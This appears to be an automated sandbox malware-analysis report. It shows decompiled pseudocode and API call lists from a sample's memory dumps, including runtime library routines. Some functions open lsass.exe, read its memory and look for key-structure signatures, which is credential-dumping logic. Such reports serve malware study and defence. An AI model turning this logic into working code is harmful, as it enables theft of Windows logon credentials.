    							_t2 = _t47 + 2; // 0x2
    							_t53 = _t2;
    							_t27 = CreateFileW(_t21, 0x80000000, 1, 0, 3, 0, 0);
    							L7:
    							_t47 = _t27;
    							if(_t47 == 0 || _t47 == 0xffffffff || E10013FC0(_t47, 0x1001f294) == 0) {
    								L23:
    								 *0x1001f294 = 0;
    								CloseHandle(_t47);
    							} else {
    								if(_t53 == 2) {
    									_t29 = _v40;
    									_t52 =  *0x1001f2a0; // 0x1db1
    									_t39 =  *0x1001f29c; // 0x1
    									_t44 =  *0x1001f298; // 0x6
    									goto L15;
    								} else {
    									_t37 = GetCurrentProcess();
    									__imp__IsWow64Process(_t37,  &_v40);
    									_t29 = _v48;
    									if(_t37 == 0 || _t29 == 0) {
    										_t44 =  *0x1001f384; // 0x6
    										_t39 =  *0x1001f3cc; // 0x1
    										_t52 =  *0x1001f388; // 0x1db1
    										 *0x1001f298 = _t44;
    										 *0x1001f29c = _t39;
    										 *0x1001f2a0 = _t52;
    										L15:
    										if(_t29 != 0) {
    											goto L23;
    										} else {
    											asm("sbb eax, eax");
    											 *0x1001e268 = _t29 + 1;
    											if(_t44 >= 6) {
    												L18:
    												 *0x1001e40c = 1;
    											} else {
    												 *0x1001e40c = 0;
    												if(_t39 < 2) {
    													goto L18;
    												}
    											}
    											_t40 =  *0x1001f294; // 0xcaa50
    											_push(0);
    											if(E100148C0(_t40, E10012590) < 0 ||  *0x1001e320 == 0 || E10012CD0(0x1001f294) == 0) {
    												goto L23;
    											} else {
    												_t33 =  *0x1001f2f8; // 0x1001a788
    												_t15 = _t33 + 8; // 0x10011860
    												_t38 =  *((intOrPtr*)( *_t15))(0x1001f294, 0x1001e30c);
    												if(_t38 < 0) {
    													goto L23;
    												}
    											}
    										}
    									} else {
    										goto L23;
    									}
    								}
    							}
    						}
    					}
    					return _t38;
    				}
    			}

    APIs
    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10012650
    • RtlInitUnicodeString.NTDLL(?,lsass.exe), ref: 1001267B
      • Part of subcall function 10014760: LocalFree.KERNEL32(?,?,?,-00000FFF,00000001), ref: 100147AC
    • OpenProcess.KERNEL32(-00000FFF,00000000,?,?,00000001,?), ref: 100126A3
      • Part of subcall function 10013FC0: LocalAlloc.KERNEL32(00000040,00000008,00000000,-00000FFF,100126C8,1001F294,?,00000001,?), ref: 10013FC8
      • Part of subcall function 10013FC0: LocalAlloc.KERNEL32(00000040,00000004,?,00000001,?), ref: 10013FE2
      • Part of subcall function 10013FC0: LocalFree.KERNEL32(00000001,?,00000001,?), ref: 10014004
    • GetCurrentProcess.KERNEL32(?), ref: 100126DD
    • IsWow64Process.KERNEL32(00000000), ref: 100126E4
      • Part of subcall function 100148C0: LocalFree.KERNEL32(?), ref: 10014976
      • Part of subcall function 100148C0: LocalAlloc.KERNEL32(00000040,?), ref: 10014A6F
      • Part of subcall function 100148C0: LocalFree.KERNEL32(?), ref: 10014ABD
      • Part of subcall function 100148C0: RtlInitUnicodeString.NTDLL(?,00000000), ref: 10014B53
      • Part of subcall function 100148C0: LocalFree.KERNEL32(?), ref: 10014B77
    • CloseHandle.KERNEL32(00000000), ref: 100127C3
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 77%
    			E00C576B4(signed int _a4, void* _a8, unsigned int _a12) {
    				signed int _v5;
    				char _v6;
    				void* _v12;
    				unsigned int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				void* _v32;
    				long _v36;
    				void* _v40;
    				long _v44;
    				signed int* _t143;
    				signed int _t145;
    				intOrPtr _t149;
    				signed int _t153;
    				signed int _t155;
    				signed char _t157;
    				unsigned int _t158;
    				intOrPtr _t162;
    				void* _t163;
    				signed int _t164;
    				signed int _t167;
    				long _t168;
    				intOrPtr _t175;
    				signed int _t176;
    				intOrPtr _t178;
    				signed int _t180;
    				signed int _t184;
    				char _t191;
    				char* _t192;
    				char _t199;
    				char* _t200;
    				signed char _t211;
    				signed int _t213;
    				long _t215;
    				signed int _t216;
    				char _t218;
    				signed char _t222;
    				signed int _t223;
    				unsigned int _t224;
    				intOrPtr _t225;
    				unsigned int _t229;
    				intOrPtr _t231;
    				signed int _t232;
    				signed int _t233;
    				signed int _t234;
    				signed int _t235;
    				signed char _t236;
    				signed int _t237;
    				signed int _t239;
    				signed int _t240;
    				signed int _t241;
    				signed int _t242;
    				signed int _t246;
    				void* _t248;
    				void* _t249;
    
    				_t213 = _a4;
    				if(_t213 != 0xfffffffe) {
    					__eflags = _t213;
    					if(_t213 < 0) {
    						L58:
    						_t143 = E00C562FF();
    						 *_t143 =  *_t143 & 0x00000000;
    						__eflags =  *_t143;
    						 *((intOrPtr*)(E00C56312())) = 9;
    						L59:
    						_t145 = E00C54E87();
    						goto L60;
    					}
    					__eflags = _t213 -  *0xc6b238; // 0x40
    					if(__eflags >= 0) {
    						goto L58;
    					}
    					_v24 = 1;
    					_t239 = _t213 >> 6;
    					_t235 = (_t213 & 0x0000003f) * 0x30;
    					_v20 = _t239;
    					_t149 =  *((intOrPtr*)(0xc6b038 + _t239 * 4));
    					_v28 = _t235;
    					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
    					_v5 = _t222;
    					__eflags = _t222 & 0x00000001;
    					if((_t222 & 0x00000001) == 0) {
    						goto L58;
    					}
    					_t223 = _a12;
    					__eflags = _t223 - 0x7fffffff;
    					if(_t223 <= 0x7fffffff) {
    						__eflags = _t223;
    						if(_t223 == 0) {
    							L57:
    							return 0;
    						}
    						__eflags = _v5 & 0x00000002;
    						if((_v5 & 0x00000002) != 0) {
    							goto L57;
    						}
    						__eflags = _a8;
    						if(_a8 == 0) {
    							goto L6;
    						}
    						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
    						_v5 = _t153;
    						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
    						_t246 = 0;
    						_t155 = _t153 - 1;
    						__eflags = _t155;
    						if(_t155 == 0) {
    							_t236 = _v24;
    							_t157 =  !_t223;
    							__eflags = _t236 & _t157;
    							if((_t236 & _t157) != 0) {
    								_t158 = 4;
    								_t224 = _t223 >> 1;
    								_v16 = _t158;
    								__eflags = _t224 - _t158;
    								if(_t224 >= _t158) {
    									_t158 = _t224;
    									_v16 = _t224;
    								}
    								_t246 = E00C561AB(_t224, _t158);
    								E00C56171(0);
    								E00C56171(0);
    								_t249 = _t248 + 0xc;
    								_v12 = _t246;
    								__eflags = _t246;
    								if(_t246 != 0) {
    									_t162 = E00C56EB0(_t213, 0, 0, _v24);
    									_t225 =  *((intOrPtr*)(0xc6b038 + _t239 * 4));
    									_t248 = _t249 + 0x10;
    									_t240 = _v28;
    									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
    									_t163 = _t246;
    									 *(_t240 + _t225 + 0x24) = _t236;
    									_t235 = _t240;
    									_t223 = _v16;
    									L21:
    									_t241 = 0;
    									_v40 = _t163;
    									_t215 =  *((intOrPtr*)(0xc6b038 + _v20 * 4));
    									_v36 = _t215;
    									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
    									_t216 = _a4;
    									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
    										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
    										_v6 = _t218;
    										__eflags = _t218 - 0xa;
    										_t216 = _a4;
    										if(_t218 != 0xa) {
    											__eflags = _t223;
    											if(_t223 != 0) {
    												_t241 = _v24;
    												 *_t163 = _v6;
    												_t216 = _a4;
    												_t232 = _t223 - 1;
    												__eflags = _v5;
    												_v12 = _t163 + 1;
    												_v16 = _t232;
    												 *((char*)(_t235 +  *((intOrPtr*)(0xc6b038 + _v20 * 4)) + 0x2a)) = 0xa;
    												if(_v5 != 0) {
    													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xc6b038 + _v20 * 4)) + 0x2b));
    													_v6 = _t191;
    													__eflags = _t191 - 0xa;
    													if(_t191 != 0xa) {
    														__eflags = _t232;
    														if(_t232 != 0) {
    															_t192 = _v12;
    															_t241 = 2;
    															 *_t192 = _v6;
    															_t216 = _a4;
    															_t233 = _t232 - 1;
    															_v12 = _t192 + 1;
    															_v16 = _t233;
    															 *((char*)(_t235 +  *((intOrPtr*)(0xc6b038 + _v20 * 4)) + 0x2b)) = 0xa;
    															__eflags = _v5 - _v24;
    															if(_v5 == _v24) {
    																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xc6b038 + _v20 * 4)) + 0x2c));
    																_v6 = _t199;
    																__eflags = _t199 - 0xa;
    																if(_t199 != 0xa) {
    																	__eflags = _t233;
    																	if(_t233 != 0) {
    																		_t200 = _v12;
    																		_t241 = 3;
    																		 *_t200 = _v6;
    																		_t216 = _a4;
    																		_t234 = _t233 - 1;
    																		__eflags = _t234;
    																		_v12 = _t200 + 1;
    																		_v16 = _t234;
    																		 *((char*)(_t235 +  *((intOrPtr*)(0xc6b038 + _v20 * 4)) + 0x2c)) = 0xa;
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    									_t164 = E00C5B46E(_t216);
    									__eflags = _t164;
    									if(_t164 == 0) {
    										L41:
    										_v24 = 0;
    										L42:
    										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
    										__eflags = _t167;
    										if(_t167 == 0) {
    											L53:
    											_t168 = GetLastError();
    											_t241 = 5;
    											__eflags = _t168 - _t241;
    											if(_t168 != _t241) {
    												__eflags = _t168 - 0x6d;
    												if(_t168 != 0x6d) {
    													L37:
    													E00C562DC(_t168);
    													goto L38;
    												}
    												_t242 = 0;
    												goto L39;
    											}
    											 *((intOrPtr*)(E00C56312())) = 9;
    											 *(E00C562FF()) = _t241;
    											goto L38;
    										}
    										_t229 = _a12;
    										__eflags = _v36 - _t229;
    										if(_v36 > _t229) {
    											goto L53;
    										}
    										_t242 = _t241 + _v36;
    										__eflags = _t242;
    										L45:
    										_t237 = _v28;
    										_t175 =  *((intOrPtr*)(0xc6b038 + _v20 * 4));
    										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
    										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
    											__eflags = _v5 - 2;
    											if(_v5 == 2) {
    												__eflags = _v24;
    												_push(_t242 >> 1);
    												_push(_v40);
    												_push(_t216);
    												if(_v24 == 0) {
    													_t176 = E00C57210();
    												} else {
    													_t176 = E00C57520();
    												}
    											} else {
    												_t230 = _t229 >> 1;
    												__eflags = _t229 >> 1;
    												_t176 = E00C573D0(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
    											}
    											_t242 = _t176;
    										}
    										goto L39;
    									}
    									_t104 =  &_v28; // 0xa
    									_t231 =  *_t104;
    									_t178 =  *((intOrPtr*)(0xc6b038 + _v20 * 4));
    									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
    									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
    										goto L41;
    									}
    									_t180 = GetConsoleMode(_v32,  &_v44);
    									__eflags = _t180;
    									if(_t180 == 0) {
    										goto L41;
    									}
    									__eflags = _v5 - 2;
    									if(_v5 != 2) {
    										goto L42;
    									}
    									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
    									__eflags = _t184;
    									if(_t184 != 0) {
    										_t229 = _a12;
    										_t242 = _t241 + _v36 * 2;
    										goto L45;
    									}
    									_t168 = GetLastError();
    									goto L37;
    								} else {
    									 *((intOrPtr*)(E00C56312())) = 0xc;
    									 *(E00C562FF()) = 8;
    									L38:
    									_t242 = _t241 | 0xffffffff;
    									__eflags = _t242;
    									L39:
    									E00C56171(_t246);
    									return _t242;
    								}
    							}
    							L15:
    							 *(E00C562FF()) =  *_t206 & _t246;
    							 *((intOrPtr*)(E00C56312())) = 0x16;
    							E00C54E87();
    							goto L38;
    						}
    						__eflags = _t155 != 1;
    						if(_t155 != 1) {
    							L13:
    							_t163 = _a8;
    							_v16 = _t223;
    							_v12 = _t163;
    							goto L21;
    						}
    						_t211 =  !_t223;
    						__eflags = _t211 & 0x00000001;
    						if((_t211 & 0x00000001) == 0) {
    							goto L15;
    						}
    						goto L13;
    					}
    					L6:
    					 *(E00C562FF()) =  *_t151 & 0x00000000;
    					 *((intOrPtr*)(E00C56312())) = 0x16;
    					goto L59;
    				} else {
    					 *(E00C562FF()) =  *_t212 & 0x00000000;
    					_t145 = E00C56312();
    					 *_t145 = 9;
    					L60:
    					return _t145 | 0xffffffff;
    				}
    			}

    APIs
      • Part of subcall function 00C561AB: RtlAllocateHeap.NTDLL(00000000,00C51FCA,?,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA,?,?,?,?), ref: 00C561DD
      • Part of subcall function 00C56171: HeapFree.KERNEL32(00000000,00000000), ref: 00C56187
      • Part of subcall function 00C56171: GetLastError.KERNEL32(?,?,00C59953,?,00000000,?,00000000,?,00C5997A,?,00000007,?,?,00C59DDC,?,?), ref: 00C56199
    • GetConsoleMode.KERNEL32(00C547D8,?), ref: 00C57942
    • ReadConsoleW.KERNEL32(00C547D8,?,00000000,?,00000000), ref: 00C57964
    • GetLastError.KERNEL32(?,?,?,?,00000000,00001000,?,?,?,?,00C547D8,00000000), ref: 00C5796E
    • ReadFile.KERNEL32(00C547D8,?,00000000,?,00000000), ref: 00C579AC
      • Part of subcall function 00C57210: ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00C572F0
      • Part of subcall function 00C573D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00000000,?,?,00000000,00001000), ref: 00C574DD
      • Part of subcall function 00C573D0: GetLastError.KERNEL32(?,?,00000000,?,?,00000000,00001000,?,?,?,?,00000000,00001000,?), ref: 00C574E9
    • GetLastError.KERNEL32(?,?,?,?,00000000,00001000,?,?,?,?,00C547D8,00000000), ref: 00C57A10
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 75%
    			E00C5ABE7(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
    				signed int _v8;
    				signed char _v15;
    				char _v16;
    				void _v24;
    				short _v28;
    				char _v31;
    				void _v32;
    				long _v36;
    				intOrPtr _v40;
    				void* _v44;
    				signed int _v48;
    				signed char* _v52;
    				long _v56;
    				int _v60;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t78;
    				signed int _t80;
    				int _t86;
    				void* _t94;
    				long _t97;
    				void _t105;
    				void* _t112;
    				signed int _t115;
    				signed int _t117;
    				signed char _t122;
    				signed char _t127;
    				intOrPtr _t128;
    				signed int _t130;
    				signed char* _t131;
    				intOrPtr* _t132;
    				signed int _t133;
    				void* _t134;
    
    				_t78 =  *0xc6a004; // 0x26d30358
    				_v8 = _t78 ^ _t133;
    				_t80 = _a8;
    				_t117 = _t80 >> 6;
    				_t115 = (_t80 & 0x0000003f) * 0x30;
    				_t131 = _a12;
    				_v52 = _t131;
    				_v48 = _t117;
    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xc6b038 + _t117 * 4)) + _t115 + 0x18));
    				_v40 = _a16 + _t131;
    				_t86 = GetConsoleCP();
    				_t132 = _a4;
    				_v60 = _t86;
    				 *_t132 = 0;
    				 *((intOrPtr*)(_t132 + 4)) = 0;
    				 *((intOrPtr*)(_t132 + 8)) = 0;
    				while(_t131 < _v40) {
    					_v28 = 0;
    					_v31 =  *_t131;
    					_t128 =  *((intOrPtr*)(0xc6b038 + _v48 * 4));
    					_t122 =  *(_t128 + _t115 + 0x2d);
    					if((_t122 & 0x00000004) == 0) {
    						if(( *(E00C59798(_t115, _t128) + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
    							_push(1);
    							_push(_t131);
    							goto L8;
    						} else {
    							if(_t131 >= _v40) {
    								_t130 = _v48;
    								 *((char*)( *((intOrPtr*)(0xc6b038 + _t130 * 4)) + _t115 + 0x2e)) =  *_t131;
    								 *( *((intOrPtr*)(0xc6b038 + _t130 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0xc6b038 + _t130 * 4)) + _t115 + 0x2d) | 0x00000004;
    								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
    							} else {
    								_t112 = E00C5A97B( &_v28, _t131, 2);
    								_t134 = _t134 + 0xc;
    								if(_t112 != 0xffffffff) {
    									_t131 =  &(_t131[1]);
    									goto L9;
    								}
    							}
    						}
    					} else {
    						_t127 = _t122 & 0x000000fb;
    						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
    						_push(2);
    						_v15 = _t127;
    						 *(_t128 + _t115 + 0x2d) = _t127;
    						_push( &_v16);
    						L8:
    						_push( &_v28);
    						_t94 = E00C5A97B();
    						_t134 = _t134 + 0xc;
    						if(_t94 != 0xffffffff) {
    							L9:
    							_t131 =  &(_t131[1]);
    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
    							_v56 = _t97;
    							if(_t97 != 0) {
    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
    									L19:
    									 *_t132 = GetLastError();
    								} else {
    									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
    									if(_v36 >= _v56) {
    										if(_v31 != 0xa) {
    											goto L16;
    										} else {
    											_t105 = 0xd;
    											_v32 = _t105;
    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
    												goto L19;
    											} else {
    												if(_v36 >= 1) {
    													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
    													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
    													goto L16;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    					goto L20;
    					L16:
    				}
    				L20:
    				return E00C51252(_t115, _v8 ^ _t133, _t131, _t132);
    			}

    APIs
    • GetConsoleCP.KERNEL32 ref: 00C5AC29
    • __Stoull.NTSTC_LIBCMT ref: 00C5ACA4
    • __Stoull.NTSTC_LIBCMT ref: 00C5ACBF
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00C5ACE5
    • WriteFile.KERNEL32(?,?,00000000,00C5B35C,00000000), ref: 00C5AD04
    • WriteFile.KERNEL32(?,?,00000001,00C5B35C,00000000), ref: 00C5AD3D
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00C5B35C,?,00000000,?,00000000,00000000), ref: 00C5AD7F
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 73%
    			E1000A3D7(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
    				signed int _v8;
    				signed char _v15;
    				char _v16;
    				void _v24;
    				short _v28;
    				char _v31;
    				void _v32;
    				long _v36;
    				intOrPtr _v40;
    				void* _v44;
    				signed int _v48;
    				signed char* _v52;
    				long _v56;
    				int _v60;
    				signed int _t78;
    				signed int _t80;
    				int _t86;
    				void* _t94;
    				long _t97;
    				void _t105;
    				void* _t112;
    				signed int _t116;
    				signed int _t118;
    				signed char _t123;
    				signed char _t128;
    				intOrPtr _t129;
    				signed int _t131;
    				signed char* _t133;
    				intOrPtr* _t135;
    				signed int _t136;
    				void* _t137;
    
    				_t78 =  *0x1001d018; // 0x26c1db24
    				_v8 = _t78 ^ _t136;
    				_t80 = _a8;
    				_t118 = _t80 >> 6;
    				_t116 = (_t80 & 0x0000003f) * 0x30;
    				_t133 = _a12;
    				_v52 = _t133;
    				_v48 = _t118;
    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1001ee60 + _t118 * 4)) + _t116 + 0x18));
    				_v40 = _a16 + _t133;
    				_t86 = GetConsoleCP();
    				_t135 = _a4;
    				_v60 = _t86;
    				 *_t135 = 0;
    				 *((intOrPtr*)(_t135 + 4)) = 0;
    				 *((intOrPtr*)(_t135 + 8)) = 0;
    				while(_t133 < _v40) {
    					_v28 = 0;
    					_v31 =  *_t133;
    					_t129 =  *((intOrPtr*)(0x1001ee60 + _v48 * 4));
    					_t123 =  *(_t129 + _t116 + 0x2d);
    					if((_t123 & 0x00000004) == 0) {
    						if(( *(E10008B4D(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
    							_push(1);
    							_push(_t133);
    							goto L8;
    						} else {
    							if(_t133 >= _v40) {
    								_t131 = _v48;
    								 *((char*)( *((intOrPtr*)(0x1001ee60 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
    								 *( *((intOrPtr*)(0x1001ee60 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x1001ee60 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
    								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
    							} else {
    								_t112 = E10007512( &_v28, _t133, 2);
    								_t137 = _t137 + 0xc;
    								if(_t112 != 0xffffffff) {
    									_t133 =  &(_t133[1]);
    									goto L9;
    								}
    							}
    						}
    					} else {
    						_t128 = _t123 & 0x000000fb;
    						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
    						_push(2);
    						_v15 = _t128;
    						 *(_t129 + _t116 + 0x2d) = _t128;
    						_push( &_v16);
    						L8:
    						_push( &_v28);
    						_t94 = E10007512();
    						_t137 = _t137 + 0xc;
    						if(_t94 != 0xffffffff) {
    							L9:
    							_t133 =  &(_t133[1]);
    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
    							_v56 = _t97;
    							if(_t97 != 0) {
    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
    									L19:
    									 *_t135 = GetLastError();
    								} else {
    									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
    									if(_v36 >= _v56) {
    										if(_v31 != 0xa) {
    											goto L16;
    										} else {
    											_t105 = 0xd;
    											_v32 = _t105;
    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
    												goto L19;
    											} else {
    												if(_v36 >= 1) {
    													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
    													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
    													goto L16;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    					goto L20;
    					L16:
    				}
    				L20:
    				return E10001B26(_v8 ^ _t136);
    			}

    APIs
    • GetConsoleCP.KERNEL32 ref: 1000A419
    • __Stoull.NTSTC_LIBCMT ref: 1000A494
    • __Stoull.NTSTC_LIBCMT ref: 1000A4AF
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 1000A4D5
    • WriteFile.KERNEL32(?,FF8BC35D,00000000,1000AB4C,00000000), ref: 1000A4F4
    • WriteFile.KERNEL32(?,?,00000001,1000AB4C,00000000), ref: 1000A52D
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,1000AB4C,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 1000A56F
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 87%
    			E100116F0(void* __ecx, void* __edx, intOrPtr* _a4) {
    				void* _v8;
    				intOrPtr _v16;
    				char _v20;
    				intOrPtr _v24;
    				void* _v28;
    				char _v32;
    				signed int _v60;
    				intOrPtr _t33;
    				void* _t44;
    				long _t52;
    				intOrPtr* _t59;
    				void* _t68;
    				void** _t69;
    				void* _t70;
    
    				_t33 =  *((intOrPtr*)(__edx + 8));
    				_v32 = 0;
    				_v24 = 0x1001f2d0;
    				_t69 = __ecx;
    				_v28 = __ecx;
    				if(_t33 >= 0x1f40) {
    					if(_t33 >= 0x24b8) {
    						_t52 = 0x3c;
    						_t6 = _t52 - 8; // 0x34
    						_t70 = _t6;
    					} else {
    						_t52 = 0x28;
    						_t5 = _t52 - 8; // 0x20
    						_t70 = _t5;
    					}
    				} else {
    					_t52 = 0x20;
    					_t4 = _t52 - 8; // 0x18
    					_t70 = _t4;
    				}
    				_t68 = LocalAlloc(0x40, _t52);
    				if(_t68 == 0) {
    					return 0;
    				} else {
    					if(E10014010( &_v28, _t69, 4) != 0 && E10014010( &_v28, _t69, 4) != 0) {
    						_v28 =  &_v20;
    						if(E10014010( &_v28, _t69, 0x14) != 0 && _v16 == 0x55555552) {
    							_v28 = _t68;
    							 *_t69 = _v8;
    							if(E10014010( &_v28, _t69, _t52) != 0 &&  *((intOrPtr*)(_t68 + 4)) == 0x4d53534b) {
    								_t44 = LocalAlloc(0x40,  *(_t68 + _t70));
    								_v28 = _t44;
    								if(_t44 != 0) {
    									 *_t69 = _v8 + 4 + _t70;
    									if(E10014010( &_v28, _t69,  *(_t68 + _t70)) != 0) {
    										_t59 = _a4;
    										_v60 = 0 |  *0x1001f248( *_t59, _t59 + 4,  *((intOrPtr*)(_t59 + 8)),  *((intOrPtr*)(_t59 + 0xc)), _v28,  *(_t68 + _t70), 0) > 0x00000000;
    									}
    									LocalFree(_v28);
    								}
    							}
    						}
    					}
    					LocalFree(_t68);
    					return _v32;
    				}
    			}

    APIs
    • LocalAlloc.KERNEL32(00000040,0000003C,C0000225,00000000,?,?), ref: 1001173C
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,10011961,1001F320,00000010), ref: 100117D5
    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,10011961,1001F320,00000010), ref: 10011831
    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,10011961,1001F320,00000010), ref: 10011838
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C55921,00000003,?,00C558C1,00000003,00C68D08,0000000C,00C559D4,00000003,00000002), ref: 00C5594C
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,00C55921,00000003,?,00C558C1,00000003,00C68D08,0000000C,00C559D4,00000003,00000002), ref: 00C5595F
    • FreeLibrary.KERNEL32(00000000,?,?,?,00C55921,00000003,?,00C558C1,00000003,00C68D08,0000000C,00C559D4,00000003,00000002,00000000), ref: 00C55982
